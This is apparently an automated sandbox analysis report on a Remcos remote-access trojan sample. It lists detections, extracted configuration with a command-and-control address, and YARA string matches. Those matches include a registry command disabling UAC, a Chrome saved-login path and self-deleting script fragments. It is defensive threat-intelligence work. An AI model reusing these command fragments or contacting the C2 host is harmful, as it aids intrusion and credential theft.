Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
6Ctc0o7vhqKgjU7.exe

Overview

General Information

Sample name:6Ctc0o7vhqKgjU7.exe
Analysis ID:1549119
MD5:5f9342df635d0a624f0284fa5bbd8b54
SHA1:15c64139cc8663711d5521d49e867de1906e0f88
SHA256:63ac85fa66152f936244088e40eb124a6888336a4508f8d3d63d818ad30e4280
Tags:exeuser-lowmal3
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Machine Learning detection for sample
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 6Ctc0o7vhqKgjU7.exe (PID: 6784 cmdline: "C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe" MD5: 5F9342DF635D0A624F0284FA5BBD8B54)
    • 6Ctc0o7vhqKgjU7.exe (PID: 332 cmdline: "C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe" MD5: 5F9342DF635D0A624F0284FA5BBD8B54)
    • 6Ctc0o7vhqKgjU7.exe (PID: 5932 cmdline: "C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe" MD5: 5F9342DF635D0A624F0284FA5BBD8B54)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["192.3.64.152:2559:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-35QZU7", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.4150350434.00000000011F0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000003.00000002.4150222621.0000000001198000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            Click to see the 20 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x6c4b8:$a1: Remcos restarted by watchdog!
                  • 0x6ca30:$a3: %02i:%02i:%02i:%03i
                  3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x6657c:$str_b2: Executing file:
                  • 0x675fc:$str_b3: GetDirectListeningPort
                  • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x67128:$str_b7: \update.vbs
                  • 0x665a4:$str_b9: Downloaded file:
                  • 0x66590:$str_b10: Downloading file:
                  • 0x66634:$str_b12: Failed to upload file:
                  • 0x675c4:$str_b13: StartForward
                  • 0x675e4:$str_b14: StopForward
                  • 0x67080:$str_b15: fso.DeleteFile "
                  • 0x67014:$str_b16: On Error Resume Next
                  • 0x670b0:$str_b17: fso.DeleteFolder "
                  • 0x66624:$str_b18: Uploaded file:
                  • 0x665e4:$str_b19: Unable to delete:
                  • 0x67048:$str_b20: while fso.FileExists("
                  • 0x66ac1:$str_c0: [Firefox StoredLogins not found]
                  Click to see the 7 entries

                  Sigma Signatures

                  Stealing of Sensitive Information

                  barindex
                  Sigma detected: Remcos
                  Source: Registry Key setAuthor: Joe Security: Data: Details: CC 3E 58 54 18 FB 05 8D 90 F6 62 0C B7 F6 96 F6 C6 30 68 ED 10 53 B2 10 5E 06 8E 7A 31 B0 C9 D4 33 CB DC 9F B5 E6 9D E9 04 41 36 F1 4E 75 67 2F 9D 4C 2A 34 98 96 CE BC 34 9E 9E F7 40 97 C2 D9 9A 41 7A A2 82 F6 B2 44 FF C6 CE 2C EE 1C 73 66 7B B0 FE 9E 26 DB , EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe, ProcessId: 5932, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-35QZU7\exepath

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-05T11:00:22.102362+010020229301A Network Trojan was detected20.12.23.50443192.168.2.449737TCP
                  2024-11-05T11:01:00.945958+010020229301A Network Trojan was detected20.12.23.50443192.168.2.449758TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-05T11:00:06.638409+010020365941Malware Command and Control Activity Detected192.168.2.449732192.3.64.1522559TCP
                  2024-11-05T11:00:38.780201+010020365941Malware Command and Control Activity Detected192.168.2.449743192.3.64.1522559TCP
                  2024-11-05T11:00:40.297031+010020365941Malware Command and Control Activity Detected192.168.2.449744192.3.64.1522559TCP
                  2024-11-05T11:00:41.840557+010020365941Malware Command and Control Activity Detected192.168.2.449745192.3.64.1522559TCP
                  2024-11-05T11:00:43.365692+010020365941Malware Command and Control Activity Detected192.168.2.449746192.3.64.1522559TCP
                  2024-11-05T11:00:44.926946+010020365941Malware Command and Control Activity Detected192.168.2.449747192.3.64.1522559TCP
                  2024-11-05T11:00:46.455416+010020365941Malware Command and Control Activity Detected192.168.2.449748192.3.64.1522559TCP
                  2024-11-05T11:00:47.983994+010020365941Malware Command and Control Activity Detected192.168.2.449749192.3.64.1522559TCP
                  2024-11-05T11:00:49.511785+010020365941Malware Command and Control Activity Detected192.168.2.449750192.3.64.1522559TCP
                  2024-11-05T11:00:51.032906+010020365941Malware Command and Control Activity Detected192.168.2.449751192.3.64.1522559TCP
                  2024-11-05T11:00:52.555688+010020365941Malware Command and Control Activity Detected192.168.2.449752192.3.64.1522559TCP
                  2024-11-05T11:00:54.092502+010020365941Malware Command and Control Activity Detected192.168.2.449753192.3.64.1522559TCP
                  2024-11-05T11:00:55.806477+010020365941Malware Command and Control Activity Detected192.168.2.449754192.3.64.1522559TCP
                  2024-11-05T11:00:57.390141+010020365941Malware Command and Control Activity Detected192.168.2.449755192.3.64.1522559TCP
                  2024-11-05T11:00:58.923499+010020365941Malware Command and Control Activity Detected192.168.2.449756192.3.64.1522559TCP
                  2024-11-05T11:01:00.462297+010020365941Malware Command and Control Activity Detected192.168.2.449759192.3.64.1522559TCP
                  2024-11-05T11:01:02.006446+010020365941Malware Command and Control Activity Detected192.168.2.449760192.3.64.1522559TCP
                  2024-11-05T11:01:03.547036+010020365941Malware Command and Control Activity Detected192.168.2.449770192.3.64.1522559TCP
                  2024-11-05T11:01:05.076623+010020365941Malware Command and Control Activity Detected192.168.2.449781192.3.64.1522559TCP
                  2024-11-05T11:01:06.620764+010020365941Malware Command and Control Activity Detected192.168.2.449791192.3.64.1522559TCP
                  2024-11-05T11:01:08.156592+010020365941Malware Command and Control Activity Detected192.168.2.449798192.3.64.1522559TCP
                  2024-11-05T11:01:09.687902+010020365941Malware Command and Control Activity Detected192.168.2.449809192.3.64.1522559TCP
                  2024-11-05T11:01:11.323923+010020365941Malware Command and Control Activity Detected192.168.2.449819192.3.64.1522559TCP
                  2024-11-05T11:01:12.849107+010020365941Malware Command and Control Activity Detected192.168.2.449830192.3.64.1522559TCP
                  2024-11-05T11:01:14.367356+010020365941Malware Command and Control Activity Detected192.168.2.449836192.3.64.1522559TCP
                  2024-11-05T11:01:15.876289+010020365941Malware Command and Control Activity Detected192.168.2.449847192.3.64.1522559TCP
                  2024-11-05T11:01:17.399262+010020365941Malware Command and Control Activity Detected192.168.2.449858192.3.64.1522559TCP
                  2024-11-05T11:01:18.972734+010020365941Malware Command and Control Activity Detected192.168.2.449866192.3.64.1522559TCP
                  2024-11-05T11:01:20.734121+010020365941Malware Command and Control Activity Detected192.168.2.449875192.3.64.1522559TCP
                  2024-11-05T11:02:52.281240+010020365941Malware Command and Control Activity Detected192.168.2.450038192.3.64.1522559TCP
                  2024-11-05T11:02:53.797351+010020365941Malware Command and Control Activity Detected192.168.2.450039192.3.64.1522559TCP
                  2024-11-05T11:02:55.336861+010020365941Malware Command and Control Activity Detected192.168.2.450040192.3.64.1522559TCP
                  2024-11-05T11:02:56.865531+010020365941Malware Command and Control Activity Detected192.168.2.450041192.3.64.1522559TCP
                  2024-11-05T11:02:58.360089+010020365941Malware Command and Control Activity Detected192.168.2.450042192.3.64.1522559TCP
                  2024-11-05T11:02:59.828922+010020365941Malware Command and Control Activity Detected192.168.2.450043192.3.64.1522559TCP
                  2024-11-05T11:03:01.395703+010020365941Malware Command and Control Activity Detected192.168.2.450044192.3.64.1522559TCP
                  2024-11-05T11:03:02.790801+010020365941Malware Command and Control Activity Detected192.168.2.450045192.3.64.1522559TCP
                  2024-11-05T11:03:04.635247+010020365941Malware Command and Control Activity Detected192.168.2.450046192.3.64.1522559TCP
                  2024-11-05T11:03:05.985002+010020365941Malware Command and Control Activity Detected192.168.2.450047192.3.64.1522559TCP
                  2024-11-05T11:03:07.289006+010020365941Malware Command and Control Activity Detected192.168.2.450048192.3.64.1522559TCP
                  2024-11-05T11:03:08.580628+010020365941Malware Command and Control Activity Detected192.168.2.450049192.3.64.1522559TCP
                  2024-11-05T11:03:09.839104+010020365941Malware Command and Control Activity Detected192.168.2.450050192.3.64.1522559TCP
                  2024-11-05T11:03:11.075772+010020365941Malware Command and Control Activity Detected192.168.2.450051192.3.64.1522559TCP
                  2024-11-05T11:03:12.286988+010020365941Malware Command and Control Activity Detected192.168.2.450052192.3.64.1522559TCP
                  2024-11-05T11:03:13.478471+010020365941Malware Command and Control Activity Detected192.168.2.450053192.3.64.1522559TCP
                  2024-11-05T11:03:14.646913+010020365941Malware Command and Control Activity Detected192.168.2.450054192.3.64.1522559TCP
                  2024-11-05T11:03:15.977568+010020365941Malware Command and Control Activity Detected192.168.2.450055192.3.64.1522559TCP
                  2024-11-05T11:03:17.104528+010020365941Malware Command and Control Activity Detected192.168.2.450056192.3.64.1522559TCP
                  2024-11-05T11:03:18.217231+010020365941Malware Command and Control Activity Detected192.168.2.450057192.3.64.1522559TCP
                  2024-11-05T11:03:19.325075+010020365941Malware Command and Control Activity Detected192.168.2.450058192.3.64.1522559TCP
                  2024-11-05T11:03:20.390850+010020365941Malware Command and Control Activity Detected192.168.2.450059192.3.64.1522559TCP
                  2024-11-05T11:03:21.436759+010020365941Malware Command and Control Activity Detected192.168.2.450060192.3.64.1522559TCP
                  2024-11-05T11:03:22.592461+010020365941Malware Command and Control Activity Detected192.168.2.450061192.3.64.1522559TCP
                  2024-11-05T11:03:23.605016+010020365941Malware Command and Control Activity Detected192.168.2.450062192.3.64.1522559TCP
                  2024-11-05T11:03:24.619841+010020365941Malware Command and Control Activity Detected192.168.2.450063192.3.64.1522559TCP
                  2024-11-05T11:03:25.603330+010020365941Malware Command and Control Activity Detected192.168.2.450064192.3.64.1522559TCP
                  2024-11-05T11:03:26.603845+010020365941Malware Command and Control Activity Detected192.168.2.450065192.3.64.1522559TCP
                  2024-11-05T11:03:27.554029+010020365941Malware Command and Control Activity Detected192.168.2.450066192.3.64.1522559TCP
                  2024-11-05T11:03:28.486990+010020365941Malware Command and Control Activity Detected192.168.2.450067192.3.64.1522559TCP
                  2024-11-05T11:03:29.410772+010020365941Malware Command and Control Activity Detected192.168.2.450068192.3.64.1522559TCP
                  2024-11-05T11:03:30.312138+010020365941Malware Command and Control Activity Detected192.168.2.450069192.3.64.1522559TCP
                  2024-11-05T11:03:31.214878+010020365941Malware Command and Control Activity Detected192.168.2.450070192.3.64.1522559TCP
                  2024-11-05T11:03:32.099975+010020365941Malware Command and Control Activity Detected192.168.2.450071192.3.64.1522559TCP
                  2024-11-05T11:03:32.991461+010020365941Malware Command and Control Activity Detected192.168.2.450072192.3.64.1522559TCP
                  2024-11-05T11:03:33.850975+010020365941Malware Command and Control Activity Detected192.168.2.450073192.3.64.1522559TCP
                  2024-11-05T11:03:34.703120+010020365941Malware Command and Control Activity Detected192.168.2.450074192.3.64.1522559TCP
                  2024-11-05T11:03:35.553486+010020365941Malware Command and Control Activity Detected192.168.2.450075192.3.64.1522559TCP
                  2024-11-05T11:03:36.395178+010020365941Malware Command and Control Activity Detected192.168.2.450076192.3.64.1522559TCP
                  2024-11-05T11:03:37.212820+010020365941Malware Command and Control Activity Detected192.168.2.450077192.3.64.1522559TCP
                  2024-11-05T11:03:38.014881+010020365941Malware Command and Control Activity Detected192.168.2.450078192.3.64.1522559TCP
                  2024-11-05T11:03:38.843323+010020365941Malware Command and Control Activity Detected192.168.2.450079192.3.64.1522559TCP
                  2024-11-05T11:03:39.652111+010020365941Malware Command and Control Activity Detected192.168.2.450080192.3.64.1522559TCP
                  2024-11-05T11:03:40.427011+010020365941Malware Command and Control Activity Detected192.168.2.450081192.3.64.1522559TCP
                  2024-11-05T11:03:41.222344+010020365941Malware Command and Control Activity Detected192.168.2.450082192.3.64.1522559TCP
                  2024-11-05T11:03:42.001603+010020365941Malware Command and Control Activity Detected192.168.2.450083192.3.64.1522559TCP
                  2024-11-05T11:03:42.766178+010020365941Malware Command and Control Activity Detected192.168.2.450084192.3.64.1522559TCP
                  2024-11-05T11:03:43.523439+010020365941Malware Command and Control Activity Detected192.168.2.450085192.3.64.1522559TCP
                  2024-11-05T11:03:44.249005+010020365941Malware Command and Control Activity Detected192.168.2.450086192.3.64.1522559TCP
                  2024-11-05T11:03:45.206171+010020365941Malware Command and Control Activity Detected192.168.2.450087192.3.64.1522559TCP
                  2024-11-05T11:03:45.927335+010020365941Malware Command and Control Activity Detected192.168.2.450088192.3.64.1522559TCP
                  2024-11-05T11:03:46.645435+010020365941Malware Command and Control Activity Detected192.168.2.450089192.3.64.1522559TCP
                  2024-11-05T11:03:47.368579+010020365941Malware Command and Control Activity Detected192.168.2.450090192.3.64.1522559TCP
                  2024-11-05T11:03:48.071323+010020365941Malware Command and Control Activity Detected192.168.2.450091192.3.64.1522559TCP
                  2024-11-05T11:03:48.869592+010020365941Malware Command and Control Activity Detected192.168.2.450092192.3.64.1522559TCP
                  2024-11-05T11:03:49.567892+010020365941Malware Command and Control Activity Detected192.168.2.450093192.3.64.1522559TCP
                  2024-11-05T11:03:50.258212+010020365941Malware Command and Control Activity Detected192.168.2.450094192.3.64.1522559TCP
                  2024-11-05T11:03:50.940124+010020365941Malware Command and Control Activity Detected192.168.2.450095192.3.64.1522559TCP
                  2024-11-05T11:03:51.626724+010020365941Malware Command and Control Activity Detected192.168.2.450096192.3.64.1522559TCP
                  2024-11-05T11:03:52.310155+010020365941Malware Command and Control Activity Detected192.168.2.450097192.3.64.1522559TCP
                  2024-11-05T11:03:52.983758+010020365941Malware Command and Control Activity Detected192.168.2.450098192.3.64.1522559TCP
                  2024-11-05T11:03:53.648182+010020365941Malware Command and Control Activity Detected192.168.2.450099192.3.64.1522559TCP
                  2024-11-05T11:03:54.487482+010020365941Malware Command and Control Activity Detected192.168.2.450100192.3.64.1522559TCP
                  2024-11-05T11:03:55.245924+010020365941Malware Command and Control Activity Detected192.168.2.450101192.3.64.1522559TCP
                  2024-11-05T11:03:55.918843+010020365941Malware Command and Control Activity Detected192.168.2.450102192.3.64.1522559TCP
                  2024-11-05T11:03:56.568841+010020365941Malware Command and Control Activity Detected192.168.2.450103192.3.64.1522559TCP
                  2024-11-05T11:03:57.211039+010020365941Malware Command and Control Activity Detected192.168.2.450104192.3.64.1522559TCP
                  2024-11-05T11:03:57.850932+010020365941Malware Command and Control Activity Detected192.168.2.450105192.3.64.1522559TCP
                  2024-11-05T11:03:58.478909+010020365941Malware Command and Control Activity Detected192.168.2.450106192.3.64.1522559TCP
                  2024-11-05T11:03:59.407104+010020365941Malware Command and Control Activity Detected192.168.2.450107192.3.64.1522559TCP
                  2024-11-05T11:04:00.042584+010020365941Malware Command and Control Activity Detected192.168.2.450108192.3.64.1522559TCP
                  2024-11-05T11:04:00.672272+010020365941Malware Command and Control Activity Detected192.168.2.450109192.3.64.1522559TCP
                  2024-11-05T11:04:02.321155+010020365941Malware Command and Control Activity Detected192.168.2.450110192.3.64.1522559TCP
                  2024-11-05T11:04:02.946702+010020365941Malware Command and Control Activity Detected192.168.2.450111192.3.64.1522559TCP
                  2024-11-05T11:04:03.691084+010020365941Malware Command and Control Activity Detected192.168.2.450112192.3.64.1522559TCP
                  2024-11-05T11:04:04.304407+010020365941Malware Command and Control Activity Detected192.168.2.450113192.3.64.1522559TCP
                  2024-11-05T11:04:04.919721+010020365941Malware Command and Control Activity Detected192.168.2.450114192.3.64.1522559TCP
                  2024-11-05T11:04:05.523669+010020365941Malware Command and Control Activity Detected192.168.2.450115192.3.64.1522559TCP
                  2024-11-05T11:04:06.131163+010020365941Malware Command and Control Activity Detected192.168.2.450116192.3.64.1522559TCP
                  2024-11-05T11:04:06.743191+010020365941Malware Command and Control Activity Detected192.168.2.450117192.3.64.1522559TCP
                  2024-11-05T11:04:07.372535+010020365941Malware Command and Control Activity Detected192.168.2.450118192.3.64.1522559TCP
                  2024-11-05T11:04:07.979396+010020365941Malware Command and Control Activity Detected192.168.2.450119192.3.64.1522559TCP
                  2024-11-05T11:04:08.562560+010020365941Malware Command and Control Activity Detected192.168.2.450120192.3.64.1522559TCP
                  2024-11-05T11:04:09.150227+010020365941Malware Command and Control Activity Detected192.168.2.450121192.3.64.1522559TCP
                  2024-11-05T11:04:09.760468+010020365941Malware Command and Control Activity Detected192.168.2.450122192.3.64.1522559TCP
                  2024-11-05T11:04:11.296757+010020365941Malware Command and Control Activity Detected192.168.2.450123192.3.64.1522559TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-05T11:00:08.654038+010028033043Unknown Traffic192.168.2.449734178.237.33.5080TCP
                  2024-11-05T11:01:23.273775+010028033043Unknown Traffic192.168.2.449891178.237.33.5080TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: 6Ctc0o7vhqKgjU7.exeAvira: detected
                  Found malware configuration
                  Source: 00000003.00000002.4150222621.0000000001198000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["192.3.64.152:2559:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-35QZU7", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                  Multi AV Scanner detection for submitted file
                  Source: 6Ctc0o7vhqKgjU7.exeReversingLabs: Detection: 34%
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.4150350434.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4150222621.0000000001198000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1715079039.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 6784, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 5932, type: MEMORYSTR
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for sample
                  Source: 6Ctc0o7vhqKgjU7.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,3_2_004338C8
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1715079039.0000000003FE5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_4328628b-8

                  Exploits

                  barindex
                  Yara detected UAC Bypass using CMSTP
                  Source: Yara matchFile source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1715079039.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 6784, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 5932, type: MEMORYSTR

                  Privilege Escalation

                  barindex
                  Contains functionality to bypass UAC (CMSTPLUA)
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_00407538 _wcslen,CoGetObject,3_2_00407538
                  Source: 6Ctc0o7vhqKgjU7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 6Ctc0o7vhqKgjU7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_0040928E
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,3_2_0041C322
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,3_2_0040C388
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_004096A0
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,3_2_00408847
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_00407877 FindFirstFileW,FindNextFileW,3_2_00407877
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,3_2_0040BB6B
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,3_2_00419B86
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,3_2_0040BD72
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,3_2_00407CD2

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49751 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49781 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49791 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49752 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49750 -> 192.3.64.152:2559
